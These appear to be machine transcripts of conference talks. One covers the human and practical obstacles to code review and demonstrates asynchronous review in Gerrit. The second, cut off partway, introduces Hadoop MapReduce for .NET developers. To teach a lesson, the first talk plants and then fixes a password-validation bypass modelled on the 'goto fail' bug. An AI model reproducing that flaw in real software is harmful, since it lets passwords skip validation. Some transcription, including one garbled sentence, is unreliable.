whoa. Thank God I don't write that code anymore. But does that mean that five years ago you were a bad programmer? I'm sure you weren't. Because at that time, you did your best possible job with the amount of knowledge you had, whatever the state of the industry was, whatever the trends were, you did your best. So you weren't a bad programmer five years ago, even though now you look at that code and you think it's crap. But it was you who wrote it. And by the same token, the code you wrote today, if you look at it in five years, you're going to think, oh, man, I was walking around holding monkeys by hand. So you are not your code. The third aspect is fear of mistakes. There is this fear of, gosh, I don't want my colleagues to see that I made this awful mistake because they're going to laugh at me and they're going to lose respect they have for me and all those things. So that's another thing that's kind of those three things, ego, identifying yourself with your code and fears of mistakes. Those are three people aspect that are kind of blockers for code reviews. So just don't do that. There is another aspect. And that's called the culture. The culture of your company, the culture of your team, or lack of culture. Because sometimes programmers, when they do code reviews, they tend to get personal, okay? And speak in absolute. This is wrong. This way of doing this thing is wrong. Let me tell you how to do it instead. And that taps on the ego, which creates conflicts. So one thing to remember when we do code reviews is that do not review the person, review the code. Those two are separate things. And do not speak in absolute. Only fools speak in absolute. Which in itself is an absolute. Okay? So those are, let's say, the people things. There is another aspect. And it's time. Now code reviews take time. And we can't escape from that fact. So this is how productivity looks like for a programmer in your average day. You see those dips? Those are the points in time when someone taps on your shoulder and asks you a question or asks you to do a code review. And those peaks, you see, they are late at night. That's when everybody is sleeping. So programmers work best when they don't have interruptions. Because then they get into the flow and they stay in the flow and they stay productive. If someone is coming every five minutes, hey, can you just review my code? It's boom. Suddenly you lose your flow. And it may take you half an hour to get back into it. And you have to look at someone else's code, which you really don't want to do right now. That's a problem. So all those things are problems that prevent teams from doing code reviews. Let's step back for a moment. What do you get from code reviews? Why should you even bother? Let me tell you three things that you get by having code reviews as a standard practice. First code quality goes up. And that I can tell you is really true. You can also think about it. Two pair of eyes will find more defects or more problems than one pair of eyes. Three pair of eyes and ten pair of eyes and 100 pair of eyes, they will find everything there is to find in that code. So code quality will go up. Also because you can enforce code conventions. Right? So code reviews give you this power. Actually, I watched that as a kid. It's called He-Man. Do anyone in the movie remember He-Man? Oh, yes. You are my people, yes. The 80s. The 80s. Good times. Then you have bugs. Okay? We talked about defects. Bugs go down. Okay? Code quality goes up. Bugs go down. And if you find a bug in a code review, it's much better than if your customers find the bug or the entire world finds the bug. Okay? So it's better to catch bugs early rather than later, especially if you are on television or on YouTube. Did CNN actually show that? I remember this is the CNN logo. That would be amazing. And then you have this aspect of as you sit with your peers and you're walking through the code and you're talking about conventions and how to do things, you share knowledge. So you share the knowledge you have about the domain or about the programming language or the framework or whatever it is, you share it into the team. Okay? So if you have someone in your team that is really expert about something, they will transfer this knowledge to other people. The hungry ones, hungry for knowledge. Okay? Code reviews are a good way to do that. So we have seen there are problems. There are people problems. There is ego. There are cultural problems. Speaking absolutes. Attacking the person instead of going after the code review. And then there is this time problem. Let's see how we can tackle that. Let's turn those things around. Okay? There is actually a way. Let's tackle this ego thing. Now if you have code reviews in place at your workplace, people will feel observed. They will feel that at some point someone else will look at their code. Therefore they will be a little bit more careful about how they write it. This is because of the big brother effect. Now it may not always be positive because it can create anxiety, but it actually improves the code quality. So just by having code reviews as a process creates this pressure on being a little bit more careful before you push that commit into the master. Okay? Big brother effect. The second thing is that code reviews trigger ambition. Why? Because you want to impress your programmer friends. Right? When you do code reviews, you want them to think that this code is awesome. You don't want to sit in a code review and people are like, yes, it works, but, you know. So it triggers this ambition that many programmers have, if not all of them have, to impress and to feel accomplished. Okay? Push their boundaries. Code reviews have that effect and they tap on the human aspects. And then when you actually do code reviews, try to be constructive. Okay? Give constructive feedback. Be nice. Those things will make code reviews easier if you just are nice to the one or the ones you're doing code reviews with. And in the end, it's important to remember this. In a project, everyone is on the same boat. You can safely assume that in a project, all team members are there to do their best because everyone wants the project to succeed and everyone wants the software to be the best possible software that can come out of that team. Now, this idea is very, at the very basis of the agile methodologies where you have the trust, trusting people in that people want to do their best, which was a contrast from the heavy process methodologies from the past where there were managers controlling everyone and checking their time reports. Why? Because they didn't trust that people wanted to do their best. And those methods were based on the assumption that people are slackers, so they need to be controlled and whipped, otherwise they won't work. That got completely torn on its head with agile, where you put trust into the team. The team will take responsibility and they will do their best. So let them do that. Okay? So code reviews is a tool that also ties to that. Now let's talk about time. Now we said take code reviews, they take time. And there is really much we can do about it. However, there are three kinds of code reviews you can do. Actually, there are six, but let's boil it down to three. So the first kind of code review is called the formal code review. And that's when you open up Outlook and you book a room, a meeting, you invite the people who are supposed to be in the code review, the people who wrote the code and the people who are supposed to review it. You book a projector even as a resource in Outlook. And sometimes you even book refreshments in Outlook as a resource. Then you all meet and you sit down and they all go, so, show us your code. And that's a pretty scary situation to be in. Now those guys are serious, they even have a typewriter, that means they really know their shit. Okay? So that's kind of intimidating. And very, very time consuming. However, that's the kind of code review that we'll find the most amount of defects. So that's one. The other kind of code reviews are those who are called over the shoulder code reviews. And those are slightly less formal. You don't have to book a meeting. You don't have to book a room. You basically just get up and go to one of your colleagues and ask, sorry, could you please review my code? And then what happens? You sit down at your computer, your colleagues are sitting next to you and you are walking them through your code. So I did this and I did that line. So that's okay. That works. It certainly requires less time and less planning. And you will find a okay amount of code defects. Why? Because if the person who wrote the code is the one working through the code, they will of course skip through parts of it and they will go fast and say, oh, don't look at that. It doesn't matter. So the people who are doing the core reviews, they don't have time to think by themselves about that code. They are just being hold by hand and quickly walk through the defects so that we can get along and get over with it. Okay? Now, I like in this particular picture, this guy goes, huh, for example, not one single semicolon. Okay? I hope they won't notice that. And then that guy over there who is paying attention goes, what? You're not going to merge that, son. So that's over the shoulder core reviews. The third type of core reviews, actually, they don't have a name. I called them the async core reviews because they happen asynchronously from when the code is written. And the person who wrote the code doesn't even have to be physically there when the core review is done. However, I found pretty difficult to find a way to represent a sync. How do you represent a sync? So instead, I put out a picture of M sync. So what are those async reviews? Those are the reviews that are done offline. If you're all using GitHub and you do a pull request, that is in itself an asynchronous core review. Why? Because you just do the pull request and you go about your business. At some point in time, later, someone will look at your code, make a notation and let you know what the problem are. So they happen temporally, asynchronously. Okay? That's kind of hard to say. But still it's true. Those are very effective. Why? Let's look at it. Now this is a very scientific measurement. It may sound like I'm pulling these numbers out of my hat, out of my hat. But those are actually being measured. So if you have this graph where the Y represents the number of defects found in a core review and the X is the time effort that takes, up on the right corner we have the formal core reviews. They take the longest time, but they find the most defects. On the lower, we have the over shoulder. They are very quick and easy and hippy. You know, you do them all the time. But they find also the least amount of defects because of the reason we talked about. Right in the middle, we have the async or the un-sync. Okay? So I propose that the kind of core reviews that should happen in a workplace are those async core reviews. Now let me give you a demo of how such a core review could happen. Now I'm going to be by myself, so I'm going to play two roles. But I just want to show you a tool that you can use to do this kind of core reviews. So now it's tool time. The best time. Now you may use GitHub for your projects. Anyone is using GitHub for their projects? At work, not open source? Okay? One? Great. And how many of you are using GitHub? Yeah, private repos. Okay, so a few. I'm guessing you are taking advantage of the pull request model to do core reviews. How many of you are doing that? Okay, so three, four. Yeah. And because not every organization wants or can use GitHub for their internal projects. So there are some tools that help you do core reviews in this fashion inside the firewall. So you don't have to have your code out in some other place. And one of them is called Garret. Now Garret is a core review tool that is a fork of another core review tool, which is a fork of another one, which was developed by Google internally. So it's closed source. It never saw the light of day. But Google is using it internally for their own development. Now at that time, I can't remember the name of the project. Something with M. Anyway, it was tied to Perforce because Google was using Perforce as source control. So this tool they built was tied with that. Now the creator of Python took that code and open source part of it and tied it instead to subversion. Yeah, but that made sense at that point in time. You know how the saying is, at that time, it sounded like a good idea. Then someone else, namely the Android open source project nonetheless, those people chose Git for their source control. And they wanted to use the same tool. So what did they do? They forked it. And they tied it to Git. Now as Git is becoming more popular every day, that's what I'm going to show you. So there are alternatives if you're using subversion. The other tool is also open source. And this works with subversion. This one works with Git. So let's, and it's being used by the Android open source project by amongst others. So let's look at how a sync code view looks like. But first let me show you this tool. So let me just mirror that. Okay. That looks strange. Let me just increase that. So this is the Garret web, a web UI that's running on my machine. And by the way, this is Garret, the open source, it's on the web. And that's the Android open source project version of Garret. So there is a web UI where you can see incoming reviews, outgoing reviews. So there is a list of commits that are pending for review. And that's the key of the asynchronous model. As you work on your day, you don't have to get interrupted. You are in your flow. You do your work. When you feel that you have five minutes, ten minutes time, you open up a tool like that, and you look, what are the pending code reviews? And you just grab one. And you do review at your time and pace. Nobody is leading you through the code. You have time to reason about it. And you can give your feedback, and then you go on. So you see the advantages of it. No one is interrupted. Still communication happens. So now I'm going to pretend that I'm a programmer, well, actually I'm a programmer. So I'm going to pretend that I'm in a project. And don't be scared by the black. It will soon turn light. So I'm in a project, and I'm using Git. So I am in a branch called demo. And I have a source file. It's called credentials.cs. Can you all guys read that font? It's okay, also in the back? Great. So this is a C sharp class. It doesn't really matter what the language is. I'm going to make a change to this class. It represents credentials. And I have a task that requires me to implement password validation. So that's how I write that code. And now don't remember no judging. Don't judge my code just yet. So this is how I whip together this code. And I'm ready to save it. So I made a change. You see on the left there are some new lines over there. Now I do the usual Git dance. So if I say cm is just an alias for commit-m, I sit a lot in the command line so I don't really write commit-m. So I just make aliases. So let's say add password validation. So I'm going to commit that. And now in my demo branch, I have a new commit which is not being pushed yet. Now the remote or the original Git repo is being hosted by Garrett. So in order for this to work, you need to let Garrett have the keys to your Git repo. So if you have a Git repo that's sitting on your local network, you have Garrett sitting in front of it and catch all the commits that come in. Okay? Let me just show you. Also to verify that it is really up. Oh! Remote show origin. Yes, so you see the remote is sitting on my local, so.local, listening on port 8080, and that's exactly the same which is over here. Okay? Yeah. Okay. So let's go back to it. So how do I... Now I want to... Someone has to look at this code. I don't want to just merge it and push it and be done with. I need someone else to look at it. What do I do? So if I sit in the command line, I could just write Git review. Now I know this looks like total magic, but I'm going to really show you what Git review does. So review is an alias, of course, like everything else. It's an alias for what, you might ask. It's an alias for this. You say push to origin, but you don't push to the same branch where you're working in. You're not even, for God's sake, pushing to master. You are pushing to a different branch that does not yet exist. And it is called for. That's the namespace of the branch. And master. Now this for master is a Garrett convention, which means that commit, I would like it to merge it to master. Just like when you do a pull request, you say, what do you want to merge it to? That is the Garrett convention. If you say for the slash and the name of a branch, that will be interpreted by Garrett as, okay, you want to merge this to master, but you need a code review before. So instead of doing push origin and all that, you can just write an alias and instead say git review. So now this has been pushed to Garrett, version of git, into that branch. Now let's look, now I'm off to the bits. Now I have no worries. Someone else, some poor, poor guy, is going to look at, you know, they have a coffee break and if I feel like doing a code review. So they go into Garrett, oh, and they see, now this looks like outgoing because it's the same account who made, it should turn out incoming, but I'm using the same account, okay? So this is both me and the people reviewing. So there is an incoming review by me. I want to merge into master, okay? Let's open it up. Whoa, I know, I know. Garrett looks like crap because programmers are not designers and you know the story. However, it reminds an awful lot of Gmail. Why? Because those are originally the people who worked at Google who made the original project. So if you need shortcuts, you can just say a question mark and you get a very Gmail-like experience. So this is how your correspondent pull request page. However, there is actually more here. Let's take a look. First, you say it needs a code review. I have a chance to review, here I have the diff over here. If I open it up, I can even review the message, okay? Like I say, oh, that message is not clear enough. But for this, for in this case, I'm going to say, you know, this message is good enough. So you just say, shift them and move to the next diff, okay? And it shows you the next file in your commit and you are ready to review. So you see I added this with some white space. That's already a point of review. So I'm going to make a comment and say, dude, what's with the white space? I hate that. And you just say, now, this reminds you an awful lot of the GitHub request. You can annotate on the lines. Works really well. Then I go into the method itself, I'm done picking the low-hanging fruits. Now let's actually look at this code. Now the people are awake among you. Made you recognize this bug. Now I'll give you a couple of minutes. Yes, sir. This is the go to fail bug or the C sharp version of it. Now a few months ago, Apple was involved in a little scandal regarding the security of their SSL implementation on iOS. Does anyone recall that? A few. Okay, for those of you who don't remember that, don't know that. So Apple had a security hole in the SSL implementation which was on everyone's iPhones and iPads, which allowed basically to bypass the verification of who the server is. Part of SSL is to check that the server really is what the server says that it is. Now there was a bug that allowed some code to bypass that and that way you could have a server that said ebay.com with SSL, but in reality it was a completely different server, taking all your inputs. Now the bug turned out to be exactly or a version of now that code was written in C. This code was written in C sharp, but that's basically the same bug. Now do you see that? What happens if I send a password that doesn't have the required length while it will set the valid to true, right? And if it doesn't have it, it will return false. However, since I don't have braces, this one will be executed when this is false, however, this will always be executed. Always. Because if you don't put braces on the if, it's only the first line after the if that's being selected. The next line, it's not part of the if. It's always there. So this way you can completely bypass the validation which happens afterwards. So what happens? I send in a password that only has the required length. This will be set to true. This will not run because it only runs when it's false. However, when I come to this line, it's going to say return true. So this is the SSL bug. And unbelievable, someone just made it in C sharp. So I'm going to say, whoa, whoa. What happens if the password has the required length? So I made another comment. So I'm done reviewing this file. They completely on my own. And now I'm ready to publish those. So you see I've draft, I have two comments that are not yet published. And the review is still pending. So now I'm ready to say, you see Garrett gives you a score. Plus one means it looks good to me, but I need someone else's opinion. So this is more advanced than the pending than the pull requests. This is a little bit of a workflow I built in. So you can ask for another pair of eyes, or you can just say, looks good to me, approved. Or you can say, you know, this works, but you're not following the conventions. And then like in this case, no way. This cannot be, this shall not pass. And you say post. Done. Now I am back to the programmer, and I look at Garrett, or actually you can type it to email, and I see that, whoa, rejected. What happened? Okay. Of course you can imagine that it will appear in another one. Then I open it up. And I look at the files and I see, okay, there are two comments over here. Let me open it up. You see Enrico made those. Let me open it. Oh, you're right. You're right. I totally see that, okay. So you can also reply and say, sorry, man, I didn't read the news. Okay. So the same idea. You can have a conversation here with comments, and you can also publish the comments. So you can have a conversation ongoing. Notice also this. If in the meantime something happens in the branch, I can always cherry pick it into another branch. So since Garrett is tied up to Git, it can take advantage of the things that Git has, for example, you can decide that, you know, I want to take that commit and take it into another branch of mine for code and for review, and you can just do that from the web UI. At the same time, if a new commit had happened, you will have a new button here that says rebase. You can keep up with what's happening in the branch as the review can take a few days or the time it needs. So it's a little bit more involved. And you can add more reviewers and so on and so forth. So it's a little bit richer than the pull request. So what happens now that I want to patch that? I want to fix the problem. Now let me go back to my file and let's fix it. Let's fix it really quick. Let's just remove the duplicate return. Now you may have opinions about how the code actually looks. This is not really what I would call idiomatic C sharp. But for the sake of this demo, let's just keep it the way it is. Also I had a, you see here this white space? I had a comment on that. So let's just empty that. So now I don't have it. Let me save it. So I removed the white space and I fixed the bug. So now how do I push this commit? So I made, of course, a change. If you've been a servant before, you may notice that when I pushed my previous commit, this happened. Now this is a piece of metadata that Garrett appends to all commits and that's what it uses to track different commits that are part of the same core review. So a core review gets feedback because we're going to address that and make a new commit, but those commits are still part of the same review process. You don't want new reviews to come up. And that ID is what Garrett uses to track that. So as long as your commit have the same ID, they will be treated as the same core review. Issue. So the easiest way to do that is to just add it and just amend. Just redo the latest commit with the same ID and with the different diff. And I'm just going to say review again. You see here this time it says updated changes. And this is the unique URL for that review. So now let's go back to our core review. Now I see that a new commit has been done right about now, part of the same review process. And if I look at the two files, let's say this one is ready to be, this is good. Let's look at that one. Now it looks better, okay? So now the problems have been addressed. You see the comments are gone because this is a new diff. I'm going to say this is good. Good to me. Now this verified is another extra thing. Verified you may not want to use it, but you could have, for example, an extra check that says this code passes all the tests and the quality gates. So not only you can review it, it could be good by review, but you also need to verify that it works in the test environment or whatever. And you can have an external build tool like Jenkins or TeamCity do that because Garrett has a REST API. So you can have TeamCity, for example, run the build and if it passes automatically, set the verify flag. Okay? Good enterprise stuff. Enterprise. So now that it has been passed, now it's ready to be submitted. And this is cool because now I can simply say submit, boom, merged. See here? Now this has been merged into the branch where it was supposed to be merged, in this case master. So the person who wrote the code doesn't have to also receive the feedback and say, okay, now it's okay, I push it. You can just push it directly from Garrett. So if I go back to my workstation and I go to master, I can simply say git pull and I got my new commit. Okay? I just pulled it from master because it got merged. Good? So this was a brief review, a brief demo of how you could carry those core reviews inside the organization without having necessarily to use GitHub or similar tools. You can simply use tools like Garrett if you're using Git or other tools if you're using, for example, subversion to do this kind of asynchronous core reviews inside your team. Okay? So you've seen the thing happen at their own pace and time and they don't disturb anyone and still a conversation happens. By the way, this is also good if you are a distributed team where people are physically in different parts of the world where it's very hard or difficult to have a natural meeting even over Skype. This works really well for distributed teams. So let me leave you, because we are actually almost done already, which is good. So you can grab a coffee before everyone else. Let me leave you with three concrete tips that you can apply when you do your core reviews. How many times have I said core reviews? Did anyone keep count? I'm guessing about 50. How many times can you really say it before it becomes noise? So first one is review small portions of code at a time. But that also implies that the commits are small. Of course, if you are going like I've seen, unfortunately, commits that consist of 130 files where the comment is many changes, that doesn't help anyone. Doesn't help the reviewers, doesn't help the people who are going to merge it, doesn't help anyone. So keep your commits small and focused. One commit, one logical change. It will make it easier to review as a single unit, like in this case. So review small portion of code at a time. Second tip I have for you is to keep a checklist. Now you can find those online for every language on the planet, because some of those bullet points, those are specific for the language you have. So for example, for C sharp or for.net, you will have a point like check for throwing argument exceptions or check for null exceptions or make sure the braces are in the right place. For C sharp. Now of course, if it's JavaScript, that list is empty. Sorry. The third tip I have for you is when you do a core review, keep it under one hour. Why? It may sound like an arbitrary number, but the human mind works well when you focus at a task at maximum one hour, because after one hour, if you keep staring at that code, you won't see anything. It will be just blah. So one hour max, and then just leave it and come back to it later, which is easier if you are doing the kind of core reviews that I showed you. You don't have anyone sitting next to you waiting. So keep those under one hour and you will be fine. With that, I would like to say thank you for your attention. And we have a good 20 minutes for questions. If you have any, I'll take them now. Yes? If you have some kind of artifact that you are looking at when you do those kind of work. So the question is, if you do architecture reviews or design reviews, can they also be done that way? Yes, if you have an artifact that is shared that represents what you are talking about, because you kind of need, so this is based on files basically, diffs of files. So if you have some kind of document that has been worked on, which may be the architecture or the guidelines, then yes. But that's another thing. If you are thinking about the wide board session where everybody is throwing around ideas and brainstorming, that must be done of course in person. This is about reviewing documents or reviewing text that evolves over time. So you mean if you have different artifacts? Not every single comment, but you know, after several comments you will have like, you know, maybe some artifact. Okay, so you mean if one core review explodes into a deeper discussion of the architecture of the system, you mean that, which can happen, programmers being programmers, those back and forth can go on forever, and it happens also in GitHub. So at that point, a tool doesn't help you. Actually, you need to talk to the human beings. Those work because they don't scale to infinity. So those discussions at some point, yeah, we are dealing with people. So even if, which is kind of ironic, you know, many people say, hey, I became a programmer because I didn't want to deal with people, only with computers, and then they find out that programming is all about dealing with people. I was like, oh. Okay. Yes. More questions? Yes? So the question is what if I make a change and I want to review before I go on with that change? Yes, yes, yes. And you want to submit small changes? Yes. But you can't really submit it until it's reviewed, right? Okay, because I need to build on top of that afterwards. So the question is, so I make a few changes. I make small commits, and now I want someone to review those before I push them because I need some other work to happen, or someone else in the team needs those changes in order to build upon it. And a tool help, is that the question? Just how you deal with that? Yes. Yes. Exactly. In the async or async, it depends on your musical preferences, a tool like Garrett supports the concept of a blocking core review. So two core reviews, one core review comes in, another change comes in and says, I need that core review to pass before this passes. So there is the concept of depend on or blocks. And you will see those in the same review page, you will see this core review is blocking those two. So if you've seen in the Android project, the whole list was full of core reviews with dependencies. So the people who are reviewing, of course, they're going to have to prioritize those that others are waiting on. So those are built into the tools, absolutely. I think in practice what I see happen is that you keep working and then the next version of the core review has the fixes from the last one and lots of new changes. So yes. So of course, if you take, so the question is sometimes it takes too long and people just continue carrying on without waiting for the feedback. And that's a human aspect of it, of course. The fact that those can happen asynchronously doesn't mean that you can wait weeks before core reviewing. Because if the code base is changing quickly and core reviews need to happen, for the reason we explained, like code quality and all sharing all this, then you need to prioritize that as part of your day of your activities. Like you're checking email, you're checking Twitter, you do a core review, you check Twitter, you do a core review, you work, you get a coffee, you check Twitter and then you make a core review. So you have to find a workflow that works for you during the day, right? It's not just because you have a tool that automatically works itself out. You need to process. I hate to say process. You need some kind of discipline, of course. This just helps to not interrupt anyone and to give the reviewer time to think by themselves. Instead of having someone sitting and pointing at the screen, look at this and look at that. So that's what the tool helps with. Any other questions? Yes? Yes, you. Oh, sorry. There were two aligned. Sorry. You raised your hand exactly at the same time and one was the Zeta index of the one was higher, so I didn't see. Sorry. It's for you first. Yes. So does the code review in your opinion tend to become a bottleneck and how much of your time is spent on the core reviews? Yeah. So the question is how much time do you spend on the core reviews and does it become a bottleneck? So if you keep the changes small, the core reviews will be quick. It will even maybe take a couple of minutes. Small diff, yes, looks good. Go on. On the other hand, if the changes are big, then they become cumbersome, but that's something that you can address. You just agree on your team, make small changes, make small commits. That will be, you just process them at some point. Of course, you need to pay attention. Just not say, okay, okay, okay. Just to get rid of them. Of course, you need to look a little bit. But if diffs are small, it takes no time. And another thing, if you have this process in place where people are constantly reviewing each other's code, constantly doing that, they will create synergy. So the longer you do it, then the better the team members are in sync with each other because they're been looking at each other's code. And they talk about stuff that maybe one person does differently than another programmer. So they will discuss why do you do that, but I like to do that. So they talk about those issues, and then they agree upon a convention. So the longer you have this that in place, the more synergy there is in the group, and the less issues you will find in code reviews. Because the code will start to look homogeneous. Okay? They will follow the conventions. Another good side effect is that spreading the knowledge not only of the language or the framework, but also the knowledge of different parts of the system. Something that I see very often is the department, especially on large projects. A bug report comes in, it's in module foo, and everybody goes, oh, that's not me. I didn't write that module. I have no idea how it works because I only worked on module bar. Okay? And that happens all the time. If you have people reviewing each other's code, they will know how different parts of the system are written. So they have a chance to go in and fix it. So you don't have that, oh, not me, sorry, I'm going home. They will have a chance to fix it, go in in each other's code and fix it because they've seen it before. They kept along with the development of it. So that's another good side effect. I don't know if you're down for the question. Does he answer the question? Yeah, yeah. It's hard to measure, like, weekly, but the code reviews that I do, they take from 30 seconds to the longest ones are like 20, 25 minutes. Then I get tired or I get bored. I do something else. But with a tool like that, I can just go off and do something else and come back to reviewing and just pick up where I left off. So there was another question on the back? No? Maybe I answered too much. Are there any other questions? If you think about the questions or you want to discuss this with me, just ping me on Twitter or just find me on the venue. Thank you very much. Lin YOU NEишь unlock a blog to demand a borrowed service, read something from the blog, titles, more. I'm really凡 smart. What will I do if I try to, if I try to, if I help someone here? Alright, let's get started.
|
It's undisputed that regular peer reviews are one of the most effective ways to maintain high quality in a code base. Yet, so many development teams choose not to adopt them for their software project.In the publishing industry, no written word ever sees the light of day before it has gone through an extensive period of critical review. This applies to books, scientific papers and newspaper articles alike. Why not software? In this session we'll explore the social and practical reasons why code reviews aren't as widely adopted in modern software development shops as they should be.We'll also look at a few concrete tools and techniques that teams can put in place to help them overcome the most common road blocks. In the end, we'll see how code reviews help peers leverage each other's knowledge and skills to ensure their work is as good as it can possibly be.
|
10.5446/50803 (DOI)
|
Okay, can everybody hear me all right? Yep, excellent. All right, we'll crack on because we've got a lot to cover in this hour, so we'll get started. So this is me. My name's Gary Short. I'm an MVP, C-Sharp MVP, freelance data scientist. I specialize really in big data architecture and engineering, using all that cool stuff there. Data scientist, it covers a kind of broad church or a wide variety of sins, as we like to say, but mainly I specialize in predictive analytics and computational linguistics. The most important thing about that slide really is the part at the bottom there where you can see my contact details. If you've got any questions after the talk or you want to chat to me about anything, then please feel free to reach out to me. So what we're going to cover in the next hour briefly is this is a kickstarter on getting Microsoft developers, particularly.NET developers really, up and running on Hadoop as quickly as we can. So what we're going to cover in this next hour is what problem does Hadoop solve? We're just going to quickly demonstrate the actual problem that it solves so that we can kind of set a frame of reference. We'll talk about how we can install it on your local dev machine, how to get your C-Sharp code running on it. Now I see C-Sharp code there. Actually you can set at that point your favorite.NET language, whatever that may be. So if it's VB, if it's F-Sharp, whatever you use, it's all the same. These examples will be in C-Sharp, but other than that, you can use any language that you like really. We'll talk a little bit about how I'll give you a brief demonstration of how to visualize your results, because that's really important as well. And then at the end, we'll talk a bit about how you instrument your code once it's up and running in Hadoop. How do you see what it's actually doing? You don't want it really to be a fire and forget. And then at the end, I say at the end, think about questions. It's got to take up some position in the agenda, so I put it at the end. But actually, if you've got any questions as we're going through, just ask them. It's always easier for me as a presenter to answer questions that you've got at the time, instead of having to go back in my talk, mainly because I'm a bear of a little brain, and I'll probably have forgotten what it was I was talking about by the time we get to the end, and you actually ask your question. Okay, so what we want to do now is I want to give you a quick demonstration then of what problem Hadoop solves. So we're going to come out of the slides there for a second. And I'll go up down here, open Visual Studio, and have a quick look at the problem here. So for some reason, totally unknown to me, the canonical example for Hadoop is the word count. A bit like the canonical example for any programming language that you'll ever come to learn is Hello World. The canonical example for Hadoop is Hello, is the word count. And we all know if you don't start with the canonical examples, then the demo gods will smite you and the rest of your presentation will fall apart. So we're going to do the same, we're going to start with the canonical example. So what I've got here is a very naive word count algorithm that you might run on your local machine. So the first slide here, what I've got is a simulation of an input. It's just a string of numbers, and you can see there, sorry, a string of words, and you can see there that I've got one, one, two, two, three, three, and four, four, so you can see what I did there. All right, so it'll make it easier to see if the word count is working properly. And then what I do is I split that up on the comma, I then use the group by statement to group those words together. Then I iterate over the grouping of words, and what I do is I write out the word, having trimmed off the extra spaces at the start and at the end, and also I then count the number of times it appears, the number of times it's in the group. All right, so that's a very naive word count problem, algorithm, sorry, we can run that, see that it works. Okay, and you can see that that works. One appears one time, two appears two times. Okay, so the issue with that is that it is both memory and CPU bound. Okay, it's memory bound obviously, because what we're doing there is we're reading the entire input into memory, and then we're iterating over it. And you can say, well, okay, that's fine. You know, as the input grows, then we'll stop actually reading it all into memory at one time, and we'll just read it line at time. And that's when it becomes CPU bound, because it becomes a point where the input is so big that even reading it one line at a time, the CPU doesn't operate fast enough for you to get the answer in any kind of reasonable time. All right, and now people say to me, ah, yes, but Gary, you know, you can use the TPL library and you can run several of them at a time. And I can say yes, but what happens if your input doubles? Oh, well, Gary, don't worry about that, you know, because now I saw a really cool talk earlier on this week about offloading CPU work on to the GPU so I can do that too. I said, yes, you can, but what happens if I double that input? And I can keep, like a child, just keep saying that until you want it, and eventually you'll realize that you will exhaust the resources of a single machine no matter how big that machine is. Okay, so that's the actual problem. So what we have to do is we have to get around that problem. And what do developers do? What's the first kind of tool in our toolbox when we want to overcome these problems? We reach for straight away, and that tool is divide and conquer. We don't only do that as developers, we actually do that as children. And we actually do that as adults. It's a natural human reaction, divide and conquer. Getting many things done at once or doing something else while something else is doing a good example of that is your commute to work. Hands up here if you commute to work. Okay, keep your hands up if you've got a best time for that commute to work. And the hands up if you are secretly pleased every time you beat that best time. Okay, so it's something that we do naturally. We do that divide and conquer. I can be in the morning, I can get the kettle on and while that's boiling I'll make my toast and then we can get out the door and that'll give me an extra 15 minutes in bed. Dividing conquer is the thing we naturally reach for. And it's the same for this problem. And so our equivalent in the Hadoop world of divide and conquer is map and reduce. Alright, so if I quickly just switch over to this solution now and open up this problem, what I've got is the exact same problem, but then split over a map and reduce function. So what I've got here is you can see the exact same input here, it gets passed to a mapper, and then the output of that mapper gets passed to the reducer. Okay, so what does a mapper do? What a mapper does is it takes any given input and for any given input it outputs a key value pair. Okay, and the key in the value can be strings, but it can be in the value, it can be anything that can be expressed as a string. So if you've got an object graph and you can see the line that down to a string, you can attach that to the value. So it doesn't have to be one value. And for this particular case, what our algorithm is doing is it's for every word that it sees, it's outputting the word and the integer one. So basically what the mapper is doing is it's saying, I've seen that word once, I've seen that word once, I've seen that word once. Okay, now if you have a look at the actual algorithm in there, it looks pretty similar to the actual naive algorithm they had. So we haven't actually had to change our algorithm that much other than to do the output. Okay, so it looks pretty much the same. Moving down here to the reducer, and what the reducer does is it takes the output from the mapper and for every key which is the same. So for all the matching keys, all the matching keys come to the reducer and the reducer then reduces down all of those mapped outputs with the same key to a single value. Okay, so in our case, what it's going to do is it's going to take for every word that appears, it's going to appear a number of times and all the reducer is going to do is to count up the number of times that appears. And it's also going to output a key value pair and this time the key will be the word itself and the value will be the reduction or in this particular case the summation of all those ones to do our word count. Okay, so first thing we're going to do is just prove that that works. So if I click on here and I make that the start up and quickly launch that, we should see it's exactly the same output. All right, so we know we've got our algorithm working properly. And what we've done here is we've now split it, we've done a divide and conquer, we split it into a map and reduce function. And those map and reduce functions can be spread out over as many nodes in a cluster as we want. Okay, so now when ChildishGarry comes along and says, ah, yes, but what happens when the input doubles? I just say, well, I double the number of nodes in my cluster. But what happens if I double the input? Well, I double the number of nodes in my cluster and then we can we can keep going like that until one of us gets tired. So what we've done here is gotten rid of that problem of large input and not been able to deal with it on a single machine. Okay, and that is the problem area that we're working in. It's the problem that map reduce fixes. Okay. So let's jump back to our slides now. Okay, so that's what map reduce does. But actually, much like a man who's, if you're a software developer, okay, and you have a problem, and you decide to solve that problem with regular expressions, you now have two problems. Okay, you're an original one. And the fact that you're trying to use regular expressions to solve your problem. It's the same here with using map reduce. All we've actually done is swap one problem for a whole new set of problems. So the initial problem we had was that the size of our input was was too much for a single machine to deal with. And we solved that problem by using map and reduce and pushing the map and reduce functions out onto nodes in a cluster. But that gives us a whole new set of problems to deal with. Okay, so for example, you will have to it's your responsibility to split up that input into those different parts and to push those out. You also have to deal with hard disk failures. What happens if you've got 10 nodes in your compute cluster, and you break up your input into 10 parts and you push it out onto there, and you start to run your map function, and one of the hard drives fails on one of the machines, right? You're now only going to get nine tenths of the input. So you have to deal with that. All right, so you've got a whole load of new problems to deal with. So whilst map reduce solves that problem, what we really want, so map reduce solves the problem of dealing with large input, what we really need is a framework which will take all of that hard lifting off of our shoulders of all those other problems that using map reduce brings. And that's what Hadoop does. Okay, so Hadoop will lift all of those issues off of our shoulders for us. So this is a little bit awkward actually because normally at this point, I point to the screen, only I don't have the screen here. It's at the sides. But this is a diagram of how Hadoop actually works. So the part on the left hand side will take any kind of input. So the input on the left hand side comes in, and it goes into the name node at the top. And what the name node does by default is it splits your input, your file, whatever size it is, up into by default 64 megabyte chunks. And each of those 64 megabyte chunks is saved once and replicated twice. Okay, so the first time it's replicated, it's replicated in a node in the same rack as the one that it was stored on. So that gives us node redundancy. So once we're running our map function, if we get a hard drive failure in the node that's running, we've got another node in that rack that's got the same data and is running the same resource. Okay, so that gives us redundancy between using nodes, losing nodes. And the second time it's replicated, it's replicated in a node in a separate rack. So now we've got rack redundancy. So actually, when our map produced job is running on Hadoop, we can lose an entire rack of nodes from our cluster and our work will still get completed. Okay, so that's how it deals with that problem for us. On the right hand side is where our map produced functions are coming in. So we'll put a map function on there and that gets sent out to the nodes in the cluster as well. So now 